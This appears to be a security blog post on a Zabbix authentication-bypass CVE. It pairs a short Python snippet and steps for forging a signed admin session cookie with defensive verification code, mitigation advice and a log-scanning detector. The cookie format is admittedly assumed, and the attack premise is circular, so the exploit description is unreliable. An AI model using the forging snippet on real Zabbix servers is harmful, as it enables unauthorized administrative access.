CVE-2024-36466 - Zabbix Authentication Bypass Exploit: Gaining Admin Access via Forged zbx_session Cookies

A critical security vulnerability (CVE-2024-36466) has been discovered in Zabbix, a popular open-source monitoring software. This vulnerability allows an attacker to bypass the authentication system and sign in with administrative privileges by forging a zbx_session cookie. This could potentially lead to unauthorized access to sensitive data, network infrastructure, and even complete control over the entire Zabbix installation. In this post, we will explore the details of this exploit, including how it works, steps to reproduce it, and mitigation strategies.

Vulnerability Details

The CVE-2024-36466 vulnerability is caused by a bug in the Zabbix code that allows an attacker to sign a forged zbx_session cookie. This can be accomplished using the following steps:

1. Generate a valid zbx_session ID with admin permissions. This can be done by intercepting a zbx_session cookie from a legitimate administrator's session, or by using Zabbix API methods to fetch sessions.

2. Use a cryptographic signing algorithm (e.g., HMAC) to sign the forged zbx_session ID, thus making it appear as if it was generated by Zabbix itself. This can be achieved by knowing the secret key used by Zabbix for signing cookies.

3. Use the signed, forged zbx_session cookie to sign in as an administrator, granting the attacker full access to the Zabbix instance.

Here's a code snippet demonstrating how this can be achieved using Python:

import requests
import hmac
import hashlib

# Replace the following variables with your own
zabbix_url = 'https://your-zabbix-instance.com'  # Zabbix server URL
zabbix_secret = 'your_zabbix_secret_key'  # Zabbix secret key for signing cookies
zbx_session_id = 'your_zbx_session_id'  # A valid zbx_session ID with admin permissions

# Sign the zbx_session ID using HMAC-SHA256 keyed with the server's secret
signed_zbx_session_id = hmac.new(zabbix_secret.encode(), zbx_session_id.encode(), hashlib.sha256).hexdigest()

# Prepare the forged zbx_session cookie as "<session id>_<hex signature>"
cookie = {'zbx_sessionid': f'{zbx_session_id}_{signed_zbx_session_id}'}

# Access Zabbix with the forged cookie
response = requests.get(f'{zabbix_url}/zabbix.php?action=dashboard.view', cookies=cookie)
print(response.text)
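As an added, defensive counterpart to the snippet above (hypothetical code written for this post, not Zabbix's own verification routine), the following shows how the receiving side should check such a cookie. It assumes the same "<session_id>_<hex HMAC-SHA256>" layout the snippet uses, parses it strictly, and compares signatures in constant time with hmac.compare_digest so a forged value cannot be refined through timing differences. It also demonstrates the consequence of rotating the signing key (mitigation step 3 below): every cookie signed under the old key stops verifying, so users must sign in again.

```python
import hmac
import hashlib
import secrets

# Hypothetical helpers for this post. They follow the "<session_id>_<hex HMAC-SHA256>"
# layout assumed by the exploit snippet, not Zabbix's actual cookie format.

def sign_session(secret: bytes, session_id: str) -> str:
    """Return the signed cookie value for a server-issued session id."""
    if not session_id or "_" in session_id:
        raise ValueError("session id must be non-empty and contain no '_'")
    tag = hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()
    return f"{session_id}_{tag}"

def verify_cookie(secret: bytes, cookie_value: str):
    """Return the session id if the cookie carries a valid signature, else None."""
    if not isinstance(cookie_value, str) or cookie_value.count("_") != 1:
        return None  # malformed: must be exactly two parts
    session_id, presented_tag = cookie_value.split("_", 1)
    if not session_id or len(presented_tag) != 64:
        return None  # a SHA-256 hex digest is always 64 characters
    expected_tag = hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()
    # Constant-time comparison: never use == on authentication tags
    if not hmac.compare_digest(expected_tag, presented_tag):
        return None  # signature mismatch: forged, tampered, or signed under a rotated key
    return session_id

def new_secret() -> bytes:
    """Generate a fresh 256-bit signing key (used here to illustrate rotation)."""
    return secrets.token_bytes(32)

def demo():
    """Run the cases a defender cares about and return their outcomes."""
    key = b"constructed-demo-key-do-not-reuse"  # constructed, not a real key
    sid = "deadbeef01234567"                     # constructed session id
    good = sign_session(key, sid)
    # Case 1: a different session id spliced onto a captured, valid signature
    tampered = "cafebabe76543210_" + good.split("_", 1)[1]
    # Case 2: a cookie signed with a guessed key
    wrong_key = sign_session(b"guessed-key", sid)
    # Case 3: the server rotated its key; the previously valid cookie is now rejected
    rotated = new_secret()
    return {
        "valid": verify_cookie(key, good),
        "tampered_id": verify_cookie(key, tampered),
        "wrong_key": verify_cookie(key, wrong_key),
        "malformed": verify_cookie(key, "no-separator"),
        "after_rotation": verify_cookie(rotated, good),
    }

if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:15} -> {result}")
```

Only the first case yields a session id; the other four return None. Note that rotation is a blunt instrument: it logs every user out at once, so schedule it and pair it with the monitoring described further down rather than relying on it alone.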

Original References

- Zabbix Official Website: https://www.zabbix.com/
- CVE Information: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36466

Exploit Impact

If an attacker successfully exploits this vulnerability, they can gain unauthorized access to administrator accounts and perform sensitive actions such as:

- Disabling or tampering with monitoring procedures

- Executing arbitrary code or scripts on the Zabbix server (if script execution is enabled in Zabbix actions)

To protect against this exploit, Zabbix administrators should take the following steps:

1. Verify that you are running the latest version of Zabbix. The Zabbix team frequently releases security updates, and it is highly recommended to stay up to date. If the vulnerability still affects the latest version, apply any available patches or workarounds provided by the Zabbix team.

2. Monitor your Zabbix instance for any signs of unauthorized access or suspicious behavior. Pay particular attention to zbx_session cookies in use and keep an eye out for any unusual activity.

3. Regularly review and update the secret key used by Zabbix for signing cookies. If possible, implement a strong key management strategy to prevent attackers from discovering the secret key.

4. Limit access to the Zabbix server by using appropriate firewall rules, IP whitelisting, and restricting user roles and permissions. This can help minimize any potential damage in case the exploit is used against your Zabbix installation.
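As an added illustration of step 2, the following script (written for this post; not a Zabbix component) scans constructed access-log lines from a reverse proxy that is assumed, hypothetically, to log the zbx_sessionid cookie value. It raises two kinds of alert: a cookie that does not have the "<session_id>_<hex HMAC>" shape assumed earlier in this post, and one session id presented from more than one client address, which is what cookie replay or forgery looks like in traffic. Session ids are reported as truncated SHA-256 fingerprints so the alert output itself never carries a live cookie.

```python
import re
import hashlib
from collections import defaultdict

# Constructed sample log lines (not from a real instance) in a common-log-like layout.
# The trailing zbx_sessionid=... field is a hypothetical proxy logging choice.
SIG_A = "a" * 64   # stands in for a 64-hex-char HMAC-SHA256 tag
SIG_B = "b" * 64
SAMPLE_LOG = f"""\
10.0.0.5 - [28/Nov/2024:08:01:10 +0000] "GET /zabbix.php?action=dashboard.view HTTP/1.1" 200 zbx_sessionid=a1b2c3d4e5f60718_{SIG_A}
10.0.0.5 - [28/Nov/2024:08:02:44 +0000] "GET /zabbix.php?action=host.list HTTP/1.1" 200 zbx_sessionid=a1b2c3d4e5f60718_{SIG_A}
203.0.113.9 - [28/Nov/2024:08:03:01 +0000] "GET /zabbix.php?action=dashboard.view HTTP/1.1" 200 zbx_sessionid=a1b2c3d4e5f60718_{SIG_A}
198.51.100.7 - [28/Nov/2024:08:03:30 +0000] "GET /zabbix.php?action=dashboard.view HTTP/1.1" 302 zbx_sessionid=ffffffffffffffff_notahexdigest
10.0.0.8 - [28/Nov/2024:08:04:12 +0000] "GET /zabbix.php?action=dashboard.view HTTP/1.1" 200 zbx_sessionid=0badc0ffee112233_{SIG_B}
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) - \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) '
    r'zbx_sessionid=(?P<cookie>\S+)$'
)
# Expected cookie shape under the assumed format: <id>_<64 lowercase hex chars>
COOKIE_RE = re.compile(r"^(?P<sid>[^_\s]+)_(?P<tag>[0-9a-f]{64})$")

def fingerprint(session_id: str) -> str:
    """Short, non-reversible label so alerts never contain a usable session id."""
    return hashlib.sha256(session_id.encode()).hexdigest()[:12]

def analyse(log_text: str):
    """Return (alerts, sessions): alerts is a list of (kind, detail); sessions maps id -> set of IPs."""
    alerts = []
    ips_by_session = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            alerts.append(("unparsed_line", line))
            continue
        c = COOKIE_RE.match(m["cookie"])
        if not c:
            # Not <id>_<64 hex>: cannot have been issued by the server under the assumed format
            alerts.append(("malformed_cookie", f"{m['ip']} at {m['ts']}"))
            continue
        ips_by_session[c["sid"]].add(m["ip"])
    for sid, ips in ips_by_session.items():
        if len(ips) > 1:
            # The same session presented from several client addresses
            alerts.append(("session_from_multiple_ips",
                           f"session {fingerprint(sid)} seen from {sorted(ips)}"))
    return alerts, dict(ips_by_session)

if __name__ == "__main__":
    found, _ = analyse(SAMPLE_LOG)
    for kind, detail in found:
        print(f"[{kind}] {detail}")
```

On the sample above this flags the malformed cookie from 198.51.100.7 and the session shared between 10.0.0.5 and 203.0.113.9, while the single-address session from 10.0.0.8 passes. In production, expect benign multi-IP sessions from users on mobile networks or behind load-balanced egress, so treat the second alert as a lead to correlate with Zabbix's own audit log rather than as proof of compromise.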

Conclusion

The CVE-2024-36466 vulnerability presents a significant risk to Zabbix administrators, as it grants attackers the ability to gain unauthorized access to admin accounts by forging zbx_session cookies. It is crucial for administrators to take the necessary steps to mitigate this risk and stay vigilant in monitoring their Zabbix instances for any signs of exploitation.

Timeline

Published on: 11/28/2024 08:15:05 UTC